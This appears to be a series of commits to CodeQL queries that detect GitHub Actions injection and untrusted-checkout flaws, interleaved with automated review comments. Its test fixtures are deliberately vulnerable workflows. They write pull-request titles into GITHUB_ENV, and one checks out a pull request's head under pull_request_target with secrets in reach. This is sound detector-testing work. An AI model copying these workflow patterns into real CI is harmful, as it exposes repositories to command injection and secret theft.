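Review bot: The new guard in `GhCLICommandSource` tests `.*\\b(pr|pulls)\\b.*` against the whole command string, so a `gh` command that only mentions `pr` or `pulls` in an argument, a file name or a `--jq` expression is classified as a pull-request read. It is then dropped as a source unless the trigger is in `checkoutTriggers()`, which can hide a finding on workflows started by other events. Tying the test to the subcommand position would narrow this, for example `cmd.regexpMatch("gh\\s+pr\\b.*|gh\\s+api\\b.*\\bpulls\\b.*")`, and binding it once in a private predicate would avoid evaluating the same regex twice. The definition of `checkoutTriggers()` and the rest of the class are outside the hunk.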
--- a/ql/lib/ext/config/context_event_map.yml +++ b/ql/lib/ext/config/context_event_map.yml @@ -17,10 +17,6 @@ extensions: - ["issue_comment", "github.event.changes"] - ["gollum", "github.event.pages"] - ["gollum", "github.event.changes"] - - ["merge_group", "github.event.merge_group"] - - ["pull_request", "github.event.pull_request"] - - ["pull_request", "github.head_ref"] - - ["pull_request", "github.event.changes"] - ["pull_request_comment", "github.event.comment"] - ["pull_request_comment", "github.event.pull_request"] - ["pull_request_comment", "github.head_ref"] diff --git a/ql/lib/ext/config/externally_triggereable_events.yml b/ql/lib/ext/config/externally_triggereable_events.yml index c3481c1cca5..7d40620e913 100644 --- a/ql/lib/ext/config/externally_triggereable_events.yml +++ b/ql/lib/ext/config/externally_triggereable_events.yml @@ -9,7 +9,6 @@ extensions: - ["watch"] - ["issue_comment"] - ["issues"] - - ["pull_request"] # non-privileged - ["pull_request_comment"] - ["pull_request_review"] - ["pull_request_review_comment"] From 315ffdff8d64e99fa6a247c7fd21f9da92d4607d Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 23 Oct 2024 12:15:54 +0200 Subject: [PATCH 0618/1267] Improve env var injection sanitizers --- .../actions/security/EnvVarInjectionQuery.qll | 49 ++++++++++++------- 1 file changed, 30 insertions(+), 19 deletions(-) diff --git a/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll b/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll index 99e9537a857..656ea1207b5 100644 --- a/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll +++ b/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll @@ -10,7 +10,7 @@ string sanitizerCommand() { result = [ "tr\\s+(-d\\s*)?('|\")?.n('|\")?", // tr -d '\n' ' ', tr '\n' ' ' - "tr\\s+-cd\\s+.*:alpha:", // tr -cd '[:alpha:_]' + "tr\\s+-cd\\s+.*:al(pha|num):", // tr -cd '[:alpha:_]' "(head|tail)\\s+-n\\s+1" // head -n 1, tail -n 1 ] } 
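Review bot: The `context_event_map.yml` hunk also deletes `["merge_group", "github.event.merge_group"]`, which the commit subject does not mention; it only speaks of `pull_request`. If that removal is intended, the description should say so, otherwise the row should be restored. Since the `pull_request` rows here and in `externally_triggereable_events.yml` disappear without trace, a comment in both files such as `# pull_request is intentionally omitted: treated as non-privileged` would stop a later contributor from re-adding them.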
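Review bot: In `sanitizerCommand()`, the widened pattern `tr\\s+-cd\\s+.*:al(pha|num):` keeps an unbounded `.*` in front of the class name, so a `tr -cd` set that lists a newline ahead of `[:alnum:]` would still be accepted as a sanitizer even though it preserves the character that splits `GITHUB_ENV` entries. Restricting what may precede the class, for example `tr\\s+-cd\\s+('|\")?\\[{1,2}:al(pha|num):`, narrows the allow-list, although characters listed after the class would need the same care. The trailing comment still shows only `tr -cd '[:alpha:_]'` and should mention `[:alnum:]` too.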
@@ -55,18 +55,23 @@ class EnvVarInjectionFromFileReadSink extends EnvVarInjectionSink { * echo "COMMIT_MESSAGE=${COMMIT_MESSAGE}" >> $GITHUB_ENV */ class EnvVarInjectionFromCommandSink extends EnvVarInjectionSink { + CommandSource inCommand; + string injectedVar; + string command; + EnvVarInjectionFromCommandSink() { - exists(CommandSource source, Run run, string var | - this.asExpr() = source.getEnclosingRun().getScript() and - run = source.getEnclosingRun() and - run.getScript().getACmdReachingGitHubEnvWrite(source.getCommand(), var) and + exists(Run run | + this.asExpr() = inCommand.getEnclosingRun().getScript() and + run = inCommand.getEnclosingRun() and + run.getScript().getACmdReachingGitHubEnvWrite(inCommand.getCommand(), injectedVar) and ( - not run.getScript().getACmdReachingGitHubEnvWrite(_, var) + // the source flows to the injected variable without any command in between + not run.getScript().getACmdReachingGitHubEnvWrite(_, injectedVar) and + command = "" or - exists(string sanitizer | - run.getScript().getACmdReachingGitHubEnvWrite(sanitizer, var) and - not exists(sanitizer.regexpFind(sanitizerCommand(), _, _)) - ) + // the source flows to the injected variable with a command in between + run.getScript().getACmdReachingGitHubEnvWrite(command, injectedVar) and + not command.regexpMatch(".*" + sanitizerCommand() + ".*") ) ) } 
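Review bot: In `EnvVarInjectionFromCommandSink`, the first disjunct `not run.getScript().getACmdReachingGitHubEnvWrite(_, injectedVar) and command = ""` cannot hold, because the conjunct just above it already requires `getACmdReachingGitHubEnvWrite(inCommand.getCommand(), injectedVar)` on the same script. Only the second disjunct contributes, so `command` is never `""` in this class; the branch should be dropped or its comment corrected. The second disjunct holds as soon as any one command reaching `injectedVar` is not a sanitizer, which may include `inCommand` itself, so it is worth a test that a sanitizing `tr` after the source command really suppresses the alert. The new fields `inCommand`, `injectedVar` and `command` carry no doc comments, and the class continues outside the hunk.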
@@ -81,18 +86,24 @@ class EnvVarInjectionFromCommandSink extends EnvVarInjectionSink { * echo "FOO=$BODY" >> $GITHUB_ENV */ class EnvVarInjectionFromEnvVarSink extends EnvVarInjectionSink { + string inVar; + string injectedVar; + string command; + EnvVarInjectionFromEnvVarSink() { - exists(Run run, string var_name, string var | - exists(run.getInScopeEnvVarExpr(var_name)) and + exists(Run run | run.getScript() = this.asExpr() and - run.getScript().getAnEnvReachingGitHubEnvWrite(var_name, var) and + exists(run.getInScopeEnvVarExpr(inVar)) and + run.getScript().getAnEnvReachingGitHubEnvWrite(inVar, injectedVar) and ( - not run.getScript().getACmdReachingGitHubEnvWrite(_, var) + // the source flows to the injected variable without any command in between + not run.getScript().getACmdReachingGitHubEnvWrite(_, injectedVar) and + command = "" or - exists(string sanitizer | - run.getScript().getACmdReachingGitHubEnvWrite(sanitizer, var) and - not exists(sanitizer.regexpFind(sanitizerCommand(), _, _)) - ) + // the source flows to the injected variable with a command in between + run.getScript().getACmdReachingGitHubEnvWrite(_, injectedVar) and + run.getScript().getACmdReachingGitHubEnvWrite(command, injectedVar) and + not command.regexpMatch(".*" + sanitizerCommand() + ".*") ) ) } @@ -122,7 +133,7 @@ class EnvVarInjectionFromMaDSink extends EnvVarInjectionSink { private module EnvVarInjectionConfig implements DataFlow::ConfigSig { predicate isSource(DataFlow::Node source) { source instanceof RemoteFlowSource and - not source.(RemoteFlowSource).getSourceType() = "branch" + not source.(RemoteFlowSource).getSourceType() = ["branch", "username"] } predicate isSink(DataFlow::Node sink) { sink instanceof EnvVarInjectionSink } From 43211d3286372f83747258215fb225e6c229a8ca Mon Sep 17 00:00:00 2001 
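Review bot: Replacing `regexpFind` with `command.regexpMatch(".*" + sanitizerCommand() + ".*")` changes the match from "anywhere in the string" to "the whole string", and `.` does not match line terminators unless `(?s)` is set. If `command` can span more than one line (not visible here), a sanitizer inside it is no longer recognised and the sink is reported anyway; `not command.regexpMatch("(?s).*" + sanitizerCommand() + ".*")` would restore the earlier behaviour. The same expression is used in the `EnvVarInjectionFromCommandSink` hunk above. In this hunk the line `run.getScript().getACmdReachingGitHubEnvWrite(_, injectedVar) and` is also redundant, since the next line makes the same call with `command` bound. The class body continues past the hunk.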
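Review bot: The new exclusion `not source.(RemoteFlowSource).getSourceType() = ["branch", "username"]` in `isSource` drops every source typed `username` from this query without recording why. Presumably the reasoning is that such values cannot carry a line break; a comment such as `// branch names and usernames cannot contain newlines, so they cannot add extra lines to the GITHUB_ENV file` would make that explicit. It is also worth confirming in FlowSources that `username` covers only account logins and not free-form name fields, for which the same argument would not obviously hold. The module body continues past the hunk.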
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 23 Oct 2024 12:16:02 +0200 Subject: [PATCH 0619/1267] Update tests --- .../CWE-077/.github/workflows/test17.yml | 36 +++++++++++++++++ .../CWE-077/.github/workflows/test18.yml | 32 +++++++++++++++ .../CWE-077/.github/workflows/test19.yml | 40 +++++++++++++++++++ .../CWE-094/.github/workflows/test20.yml | 19 +++++++++ .../CWE-094/CodeInjectionCritical.expected | 1 - .../CWE-094/CodeInjectionMedium.expected | 2 - 6 files changed, 127 insertions(+), 3 deletions(-) create mode 100644 ql/test/query-tests/Security/CWE-077/.github/workflows/test17.yml create mode 100644 ql/test/query-tests/Security/CWE-077/.github/workflows/test18.yml create mode 100644 ql/test/query-tests/Security/CWE-077/.github/workflows/test19.yml create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/test20.yml diff --git a/ql/test/query-tests/Security/CWE-077/.github/workflows/test17.yml b/ql/test/query-tests/Security/CWE-077/.github/workflows/test17.yml new file mode 100644 index 00000000000..dbf8c94b308 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-077/.github/workflows/test17.yml 
@@ -0,0 +1,36 @@ +on: + push: + branches: [main] + workflow_dispatch: + inputs: + pypi: + type: boolean + description: Publish + +jobs: + publish: + runs-on: ubuntu-latest + permissions: + id-token: write + steps: + - name: Checkout code + uses: actions/checkout@v4 + with: + token: ${{ secrets._GITHUB_TOKEN }} + - name: Extract PR Details + env: + GH_TOKEN: ${{ secrets._GITHUB_TOKEN }} + run: | + # Check if the event is a pull request or pull_request_target + if [ "${{ github.event_name }}" = "pull_request" ] || [ "${{ github.event_name }}" = "pull_request_target" ]; then + PR_NUMBER=${{ github.event.pull_request.number }} + PR_TITLE=$(gh pr view $PR_NUMBER --json title --jq '.title') + else + # Use gh to find the PR associated with the commit + COMMIT_SHA=${{ github.event.after }} + PR_JSON=$(gh pr list --search "${COMMIT_SHA}" --state merged --json number,title --jq '.[0]') + PR_NUMBER=$(echo $PR_JSON | jq -r '.number') + PR_TITLE=$(echo $PR_JSON | jq -r '.title') + fi + echo "PR_NUMBER=$PR_NUMBER" >> $GITHUB_ENV + echo "PR_TITLE=$PR_TITLE" >> $GITHUB_ENV diff --git a/ql/test/query-tests/Security/CWE-077/.github/workflows/test18.yml b/ql/test/query-tests/Security/CWE-077/.github/workflows/test18.yml new file mode 100644 index 00000000000..1c4b1e86312 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-077/.github/workflows/test18.yml 
@@ -0,0 +1,32 @@ +on: + schedule: + - cron: '0 0 * * *' + pull_request: + types: [ opened, synchronize, reopened ] + branches: ["master", "*-rc"] + workflow_dispatch: + +jobs: + tests: + runs-on: ubuntu-latest + steps: + - name: Checkout Repository + uses: actions/checkout@692973e3d937129bcbf40652eb9f2f61becf3332 # v4 + + - name: Set Branch Variables + id: set-branch-variables + env: + github_event_pull_request_head_repo_owner_login: ${{ github.event.pull_request.head.repo.owner.login }} + github_repository_owner: ${{ github.repository_owner }} + run: | + # Set the Repo Owner + REPO_OWNER="${github_event_pull_request_head_repo_owner_login:-$github_repository_owner}" + echo "REPO_OWNER=$REPO_OWNER" >> $GITHUB_ENV + - name: Sanitize Github Variables + id: sanitize-github-variables + env: + GITHUB_EVENT_PULL_REQUEST_TITLE: ${{ github.event.pull_request.title }} + run: | + # Delete non-alphanumeric characters and limit to 75 chars which is the branch title limit in GitHub + SAFE_PULL_REQUEST_TITLE=$(echo "${GITHUB_EVENT_PULL_REQUEST_TITLE}" | tr -cd '[:alnum:]_ -' | cut -c1-75) + echo "SAFE_PULL_REQUEST_TITLE=$SAFE_PULL_REQUEST_TITLE" >> $GITHUB_ENV diff --git a/ql/test/query-tests/Security/CWE-077/.github/workflows/test19.yml b/ql/test/query-tests/Security/CWE-077/.github/workflows/test19.yml new file mode 100644 index 00000000000..3b3b4b99ca1 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-077/.github/workflows/test19.yml 
@@ -0,0 +1,40 @@ +on: + pull_request: + workflow_dispatch: + +jobs: + build: + if: ${{ github.repository_owner == 'test' }} + runs-on: ubuntu-latest + steps: + - name: Get the appropriate Endo branch + id: branch + uses: actions/github-script@v7 + with: + result-encoding: string + script: |- + let branch = 'NOPE'; + if (context.payload.pull_request) { + const { body } = context.payload.pull_request; + const regex = /^\#endo-branch:\s+(\S+)/m; + const result = regex.exec(body); + if (result) { + branch = result[1]; + } + } + return branch; + - name: check out + id: checkout + if: steps.branch.outputs.result != 'NOPE' + uses: actions/checkout@v4 + with: + repository: test/test + path: ./tmp + ref: ${{ steps.branch.outputs.result }} + clean: 'false' + submodules: 'true' + persist-credentials: false + + - name: Find Netlify site ID + run: | + echo "NETLIFY_SITE_ID=$(cat COVERAGE_NETLIFY_SITE_ID)" >> $GITHUB_ENV diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/test20.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/test20.yml new file mode 100644 index 00000000000..27d8a666fc9 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/test20.yml 
@@ -0,0 +1,19 @@ + +on: [ workflow_dispatch, pull_request ] +jobs: + test: + runs-on: ubuntu-20.04 + steps: + - name: Preliminary Information + run: | + echo "The job was automatically triggered by a ${{ github.event_name }} event." + echo "This job is now running on a ${{ runner.os }} server hosted by GitHub!" + echo "The name of your branch is ${{ github.ref }} and your repository is ${{ github.repository }}." + echo " " + echo "github.ref = ${{ github.ref }}" + echo "github.sha = ${{ github.sha }}" + echo "github.event.pull_request.head.ref = ${{ github.event.pull_request.head.ref }}" + echo "github.event.pull_request.head.sha = ${{ github.event.pull_request.head.sha }}" + echo "github.event.pull_request.base.ref = ${{ github.event.pull_request.base.ref }}" + echo "github.event.pull_request.base.sha = ${{ github.event.pull_request.base.sha }}" + echo " " diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected index 8a134a6f7ef..dd9836805bd 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected 
@@ -360,7 +360,6 @@ nodes | .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | semmle.label | github.event.issue.body | | .github/workflows/level0.yml:69:35:69:66 | github.event.comment.body | semmle.label | github.event.comment.body | | .github/workflows/level1.yml:37:38:37:81 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | -| .github/workflows/priv_pull_request.yml:14:21:14:57 | github.event.pull_request.body | semmle.label | github.event.pull_request.body | | .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | semmle.label | github.event.pull_request.body | | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | semmle.label | github.event.pull_request.head.label | diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected index 6afef323ff0..4a561f26cb2 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected 
@@ -360,7 +360,6 @@ nodes | .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | semmle.label | github.event.issue.body | | .github/workflows/level0.yml:69:35:69:66 | github.event.comment.body | semmle.label | github.event.comment.body | | .github/workflows/level1.yml:37:38:37:81 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | -| .github/workflows/priv_pull_request.yml:14:21:14:57 | github.event.pull_request.body | semmle.label | github.event.pull_request.body | | .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | semmle.label | github.event.pull_request.body | | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | semmle.label | github.event.pull_request.head.label | 
@@ -628,7 +627,6 @@ subpaths | .github/workflows/inter-job1.yml:43:20:43:53 | needs.job1.outputs.job_output | .github/workflows/inter-job1.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job1.yml:43:20:43:53 | needs.job1.outputs.job_output | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/inter-job1.yml:43:20:43:53 | needs.job1.outputs.job_output | ${{needs.job1.outputs.job_output}} | | .github/workflows/inter-job2.yml:45:20:45:53 | needs.job1.outputs.job_output | .github/workflows/inter-job2.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job2.yml:45:20:45:53 | needs.job1.outputs.job_output | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/inter-job2.yml:45:20:45:53 | needs.job1.outputs.job_output | ${{needs.job1.outputs.job_output}} | | .github/workflows/inter-job4.yml:44:20:44:53 | needs.job1.outputs.job_output | .github/workflows/inter-job4.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job4.yml:44:20:44:53 | needs.job1.outputs.job_output | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/inter-job4.yml:44:20:44:53 | needs.job1.outputs.job_output | ${{needs.job1.outputs.job_output}} | -| .github/workflows/priv_pull_request.yml:14:21:14:57 | github.event.pull_request.body | .github/workflows/priv_pull_request.yml:14:21:14:57 | github.event.pull_request.body | .github/workflows/priv_pull_request.yml:14:21:14:57 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/priv_pull_request.yml:14:21:14:57 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | | .github/workflows/push.yml:7:19:7:57 | github.event.commits[11].message | .github/workflows/push.yml:7:19:7:57 | github.event.commits[11].message | .github/workflows/push.yml:7:19:7:57 | github.event.commits[11].message | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:7:19:7:57 | github.event.commits[11].message | ${{ github.event.commits[11].message }} | | .github/workflows/push.yml:8:19:8:62 | github.event.commits[11].author.email | .github/workflows/push.yml:8:19:8:62 | github.event.commits[11].author.email | .github/workflows/push.yml:8:19:8:62 | github.event.commits[11].author.email | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:8:19:8:62 | github.event.commits[11].author.email | ${{ github.event.commits[11].author.email }} | | .github/workflows/push.yml:9:19:9:61 | github.event.commits[11].author.name | .github/workflows/push.yml:9:19:9:61 | github.event.commits[11].author.name | .github/workflows/push.yml:9:19:9:61 | github.event.commits[11].author.name | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:9:19:9:61 | github.event.commits[11].author.name | ${{ github.event.commits[11].author.name }} | From 9a0795cc754de717b10dc7e5e2df4a6472d728ce Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 23 Oct 2024 12:16:32 +0200 Subject: [PATCH 0620/1267] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 608e186ffcd..1af220ff8fb 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml 
@@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.74 +version: 0.1.75 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index cdd396f985c..e8098e4f215 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.74 +version: 0.1.75 groups: [actions, queries] suites: codeql-suites extractor: javascript From 674afc5eddb9202def8860e2bd474541c960b6a2 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 23 Oct 2024 15:48:42 +0200 Subject: [PATCH 0621/1267] Improve labelgate accuracy --- .../codeql/actions/security/ControlChecks.qll | 16 ++++++----- ...eckout.yml => label_trusted_checkout1.yml} | 0 .../workflows/label_trusted_checkout2.yml | 28 +++++++++++++++++++ .../CWE-829/UnpinnedActionsTag.expected | 6 ++-- .../UntrustedCheckoutCritical.expected | 13 ++++++--- 5 files changed, 50 insertions(+), 13 deletions(-) rename ql/test/query-tests/Security/CWE-829/.github/workflows/{label_trusted_checkout.yml => label_trusted_checkout1.yml} (100%) create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/label_trusted_checkout2.yml diff --git a/ql/lib/codeql/actions/security/ControlChecks.qll b/ql/lib/codeql/actions/security/ControlChecks.qll index 9b50a14bca2..c73b06ae530 100644 --- a/ql/lib/codeql/actions/security/ControlChecks.qll +++ b/ql/lib/codeql/actions/security/ControlChecks.qll 
@@ -159,14 +159,16 @@ abstract class CommentVsHeadDateCheck extends ControlCheck { /* Specific implementations of control checks */ class LabelIfCheck extends LabelCheck instanceof If { + string condition; + LabelIfCheck() { - // eg: contains(github.event.pull_request.labels.*.name, 'safe to test') - // eg: github.event.label.name == 'safe to test' - exists( - normalizeExpr(this.getCondition()) - .regexpFind([ - "\\bgithub\\.event\\.pull_request\\.labels\\b", "\\bgithub\\.event\\.label\\.name\\b" - ], _, _) + condition = normalizeExpr(this.getCondition()) and + ( + // eg: contains(github.event.pull_request.labels.*.name, 'safe to test') + condition.regexpMatch("(^|[^!])contains\\(\\s*github\\.event\\.pull_request\\.labels\\b.*") + or + // eg: github.event.label.name == 'safe to test' + condition.regexpMatch(".*\\bgithub\\.event\\.label\\.name\\s*==.*") ) } } diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/label_trusted_checkout.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/label_trusted_checkout1.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-829/.github/workflows/label_trusted_checkout.yml rename to ql/test/query-tests/Security/CWE-829/.github/workflows/label_trusted_checkout1.yml diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/label_trusted_checkout2.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/label_trusted_checkout2.yml new file mode 100644 index 00000000000..6014d08ed80 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/label_trusted_checkout2.yml 
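Review bot: The first new pattern in `LabelIfCheck`, `(^|[^!])contains\\(\\s*github\\.event\\.pull_request\\.labels\\b.*`, has no leading `.*`, and `regexpMatch` must match the whole condition. The label gate is therefore recognised only when `contains(` is at the start of the normalized expression, or one character in. A compound condition such as `github.event.action == 'labeled' && contains(github.event.pull_request.labels.*.name, 'safe to test')` would no longer count as a label check, although the second pattern does allow a prefix. If that is not intended, `"(^|.*[^!])contains\\(\\s*github\\.event\\.pull_request\\.labels\\b.*"` keeps the negation test and accepts a prefix. A negation written as `contains(...) == false` still matches and would be treated as a gate; the new fixture covers only the `!contains(` form.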
@@ -0,0 +1,28 @@ +on: + pull_request_target: + types: [labeled] + +jobs: + build: + name: Build and test + runs-on: ubuntu-latest + if: | + !contains(github.event.pull_request.labels.*.name, 'safe to test') + steps: + - uses: actions/checkout@v2 + with: + ref: ${{ github.event.pull_request.head.sha }} + + - uses: actions/setup-node@v1 + - run: | + npm install + npm build + + - uses: completely/fakeaction@v2 + with: + arg1: ${{ secrets.supersecret }} + + - uses: fakerepo/comment-on-pr@v1 + with: + message: | + Thank you! diff --git a/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected b/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected index 58a000efac4..0457fd7afaa 100644 --- a/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected +++ b/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected 
@@ -13,8 +13,10 @@ | .github/workflows/issue_comment_octokit.yml:13:15:13:41 | octokit/request-action@v2.x | Unpinned 3rd party Action 'Octokit (heuristics)' step $@ uses 'octokit/request-action' with ref 'v2.x', not a pinned commit hash | .github/workflows/issue_comment_octokit.yml:12:9:19:6 | Uses Step: fetch_issue | Uses Step: fetch_issue | | .github/workflows/issue_comment_octokit.yml:20:15:20:41 | octokit/request-action@v2.x | Unpinned 3rd party Action 'Octokit (heuristics)' step $@ uses 'octokit/request-action' with ref 'v2.x', not a pinned commit hash | .github/workflows/issue_comment_octokit.yml:19:9:26:6 | Uses Step: fetch_pr | Uses Step: fetch_pr | | .github/workflows/issue_comment_octokit.yml:104:15:104:43 | octokit/request-action@v2.0.2 | Unpinned 3rd party Action 'Octokit (heuristics)' step $@ uses 'octokit/request-action' with ref 'v2.0.2', not a pinned commit hash | .github/workflows/issue_comment_octokit.yml:103:9:109:6 | Uses Step: request | Uses Step: request | -| .github/workflows/label_trusted_checkout.yml:20:13:20:36 | completely/fakeaction@v2 | Unpinned 3rd party Action 'label_trusted_checkout.yml' step $@ uses 'completely/fakeaction' with ref 'v2', not a pinned commit hash | .github/workflows/label_trusted_checkout.yml:20:7:24:4 | Uses Step | Uses Step | -| .github/workflows/label_trusted_checkout.yml:24:13:24:37 | fakerepo/comment-on-pr@v1 | Unpinned 3rd party Action 'label_trusted_checkout.yml' step $@ uses 'fakerepo/comment-on-pr' with ref 'v1', not a pinned commit hash | .github/workflows/label_trusted_checkout.yml:24:7:27:21 | Uses Step | Uses Step | +| .github/workflows/label_trusted_checkout1.yml:20:13:20:36 | completely/fakeaction@v2 | Unpinned 3rd party Action 'label_trusted_checkout1.yml' step $@ uses 'completely/fakeaction' with ref 'v2', not a pinned commit hash | .github/workflows/label_trusted_checkout1.yml:20:7:24:4 | Uses Step | Uses Step | +| .github/workflows/label_trusted_checkout1.yml:24:13:24:37 | 
fakerepo/comment-on-pr@v1 | Unpinned 3rd party Action 'label_trusted_checkout1.yml' step $@ uses 'fakerepo/comment-on-pr' with ref 'v1', not a pinned commit hash | .github/workflows/label_trusted_checkout1.yml:24:7:27:21 | Uses Step | Uses Step | +| .github/workflows/label_trusted_checkout2.yml:21:13:21:36 | completely/fakeaction@v2 | Unpinned 3rd party Action 'label_trusted_checkout2.yml' step $@ uses 'completely/fakeaction' with ref 'v2', not a pinned commit hash | .github/workflows/label_trusted_checkout2.yml:21:7:25:4 | Uses Step | Uses Step | +| .github/workflows/label_trusted_checkout2.yml:25:13:25:37 | fakerepo/comment-on-pr@v1 | Unpinned 3rd party Action 'label_trusted_checkout2.yml' step $@ uses 'fakerepo/comment-on-pr' with ref 'v1', not a pinned commit hash | .github/workflows/label_trusted_checkout2.yml:25:7:28:21 | Uses Step | Uses Step | | .github/workflows/level0.yml:36:15:36:47 | rlespinasse/github-slug-action@v4 | Unpinned 3rd party Action 'Poutine Level 0' step $@ uses 'rlespinasse/github-slug-action' with ref 'v4', not a pinned commit hash | .github/workflows/level0.yml:36:9:39:6 | Uses Step | Uses Step | | .github/workflows/mend.yml:31:15:31:34 | ruby/setup-ruby@v1 | Unpinned 3rd party Action 'Test' step $@ uses 'ruby/setup-ruby' with ref 'v1', not a pinned commit hash | .github/workflows/mend.yml:29:9:33:28 | Uses Step | Uses Step | | .github/workflows/pr-workflow.yml:60:15:60:52 | amannn/action-semantic-pull-request@v5 | Unpinned 3rd party Action 'pr-workflow' step $@ uses 'amannn/action-semantic-pull-request' with ref 'v5', not a pinned commit hash | .github/workflows/pr-workflow.yml:60:9:70:6 | Uses Step | Uses Step | diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected index 1ed39f73a48..6b273518167 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected 
+++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected 
@@ -101,10 +101,14 @@ edges | .github/workflows/issue_comment_octokit.yml:66:9:79:6 | Uses Step: sha | .github/workflows/issue_comment_octokit.yml:79:9:83:2 | Uses Step | | .github/workflows/issue_comment_octokit.yml:87:9:95:6 | Uses Step: sha | .github/workflows/issue_comment_octokit.yml:95:9:100:2 | Uses Step | | .github/workflows/issue_comment_octokit.yml:103:9:109:6 | Uses Step: request | .github/workflows/issue_comment_octokit.yml:109:9:114:66 | Uses Step | -| .github/workflows/label_trusted_checkout.yml:11:7:15:4 | Uses Step | .github/workflows/label_trusted_checkout.yml:15:7:16:4 | Uses Step | -| .github/workflows/label_trusted_checkout.yml:15:7:16:4 | Uses Step | .github/workflows/label_trusted_checkout.yml:16:7:20:4 | Run Step | -| .github/workflows/label_trusted_checkout.yml:16:7:20:4 | Run Step | .github/workflows/label_trusted_checkout.yml:20:7:24:4 | Uses Step | -| .github/workflows/label_trusted_checkout.yml:20:7:24:4 | Uses Step | .github/workflows/label_trusted_checkout.yml:24:7:27:21 | Uses Step | +| .github/workflows/label_trusted_checkout1.yml:11:7:15:4 | Uses Step | .github/workflows/label_trusted_checkout1.yml:15:7:16:4 | Uses Step | +| .github/workflows/label_trusted_checkout1.yml:15:7:16:4 | Uses Step | .github/workflows/label_trusted_checkout1.yml:16:7:20:4 | Run Step | +| .github/workflows/label_trusted_checkout1.yml:16:7:20:4 | Run Step | .github/workflows/label_trusted_checkout1.yml:20:7:24:4 | Uses Step | +| .github/workflows/label_trusted_checkout1.yml:20:7:24:4 | Uses Step | .github/workflows/label_trusted_checkout1.yml:24:7:27:21 | Uses Step | +| .github/workflows/label_trusted_checkout2.yml:12:7:16:4 | Uses Step | .github/workflows/label_trusted_checkout2.yml:16:7:17:4 | Uses Step | +| .github/workflows/label_trusted_checkout2.yml:16:7:17:4 | Uses Step | .github/workflows/label_trusted_checkout2.yml:17:7:21:4 | Run Step | +| .github/workflows/label_trusted_checkout2.yml:17:7:21:4 | Run Step | 
